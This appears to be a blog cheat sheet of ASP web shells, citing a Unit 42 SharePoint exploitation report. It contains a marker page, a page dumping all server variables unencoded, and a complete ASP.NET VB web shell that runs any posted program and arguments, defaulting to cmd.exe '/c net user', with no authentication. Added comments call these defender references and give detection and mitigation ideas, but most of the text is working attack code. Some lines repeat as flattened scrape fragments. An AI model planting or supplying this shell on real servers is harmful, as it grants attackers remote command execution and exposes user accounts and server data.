
WebShell - Cheat Sheet (asp)

Kai_HT 2025. 1. 23. 14:02

https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/

asp

<%
' Reference sample for defenders: minimal classic ASP marker page.
' It only writes a fixed string, so it executes nothing beyond Response.Write.
' NOTE(review): presumably used to confirm that an uploaded .asp file is executed
' by the server rather than served as static text; confirm against the cited report.
' Detection idea: unexpected new .asp files in web-accessible directories, and
' upload folders that are allowed to run script handlers.
%>
<!DOCTYPE html>
<html>
<body>
<%response.write("RedSec Kai_HT")%>
</body>
</html>
<%response.write("RedSec Kai_HT")%>
<%
' Reference sample for defenders: classic ASP page that lists every entry of
' Request.ServerVariables as an HTML table (name in the first cell, value in the second).
' The page performs no authentication or authorization check, so anyone who can
' request it sees the full collection (server and request metadata) - an
' information-disclosure risk if a file like this is found on a production host.
%>
<html>
<body>
<table>
<% for each key in Request.ServerVariables %>
<tr>
<td><%=key %></td>
<td>
<%
  ' Empty values are printed as a blank placeholder; every other value is written
  ' as-is, without Server.HTMLEncode, so request-derived values reach the page unencoded.
  if Request.ServerVariables(key) = "" Then
    Response.Write " "
  else
    Response.Write Request.ServerVariables(key)
  end if
%>
</td></tr>
<% Next %>
</table>
</body>
</html>
<% for each key in Request.ServerVariables %> <% Next %>
<%=key %> <% if Request.ServerVariables(key) = "" Then Response.Write " " else Response.Write Request.ServerVariables(key) end if %>
  <%--
    Reference sample for defenders: ASP.NET Web Forms (VB) command-execution web shell.
    The form posts a program path and an argument string; RunCmd starts that program
    on the server and renders its standard output in the page.
    The page contains no authentication or authorization check, so anyone who can
    reach its URL can run programs with the rights of the web application's identity.
    Detection ideas: on IIS this typically appears as the worker process (w3wp.exe)
    spawning cmd.exe or another unexpected child process; hunt web roots for .aspx files
    that import System.Diagnostics and feed form or request values into ProcessStartInfo;
    alert on new or modified script files in web-accessible directories.
    Mitigation: patch the entry point that allowed the file to be written, run the
    application pool with least privilege, and deny script execution in upload folders.
  --%>
  <%@ Page Language="VB" Debug="true" %>
  <%@ import Namespace="system.IO" %>
  <%@ import Namespace="System.Diagnostics" %>
	<script runat="server">
	' Click handler for the "Run" button: executes the posted program and shows its output.
	'   Src - the control that raised the event (unused).
	'   E   - event arguments (unused).
	Sub RunCmd(Src As Object, E As EventArgs)
	Dim myProcess As New Process()
	' Program path comes straight from the "xpath" text box, with no validation.
	Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)
	' Standard output can only be redirected when UseShellExecute is false.
	myProcessStartInfo.UseShellExecute = false
	myProcessStartInfo.RedirectStandardOutput = true
	myProcess.StartInfo = myProcessStartInfo
	' Argument string comes straight from the "xcmd" text box, with no validation.
	myProcessStartInfo.Arguments=xcmd.text
	myProcess.Start()
	' Only standard output is captured; it is read to the end before the handle is closed.
	Dim myStreamReader As StreamReader = myProcess.StandardOutput
	Dim myString As String = myStreamReader.Readtoend()
	myProcess.Close()
	
	' Only "<" and ">" are replaced before the output is placed into the result label.
	mystring=replace(mystring,"<","&lt;")
	mystring=replace(mystring,">" ,"&gt;")
	result.text=vbcrlf &"<pre>" & mystring &"</pre>"
	End Sub
	</script>
	
	<html>
		<body>
			<%-- Server-side form: both text boxes are read by RunCmd on postback. --%>
			<form runat="server">
			<p>
			<asp:Label id="L_p" runat="server" width="80px">Program</asp:Label>
			<%-- Default program is the Windows command interpreter. --%>
			<asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>
			</p>
			<asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label>
			<%-- Default arguments run "net user", which lists local user accounts. --%>
			<asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>           <p>
			<%-- The button's click event is wired to RunCmd (VB identifiers are case-insensitive). --%>
			<asp:Button id="Button" onclick="runcmd" runat="server" Width="100px" Text="Run"/>           <p>
			<asp:Label id="result" runat="server"/>
			</form>
		</body
	</html>
 <%@ Page Language="VB" Debug="true" %> <%@ import Namespace="system.IO" %> <%@ import Namespace="System.Diagnostics" %>

Programc:\windows\system32\cmd.exe

Arguments /c net user           

           

 
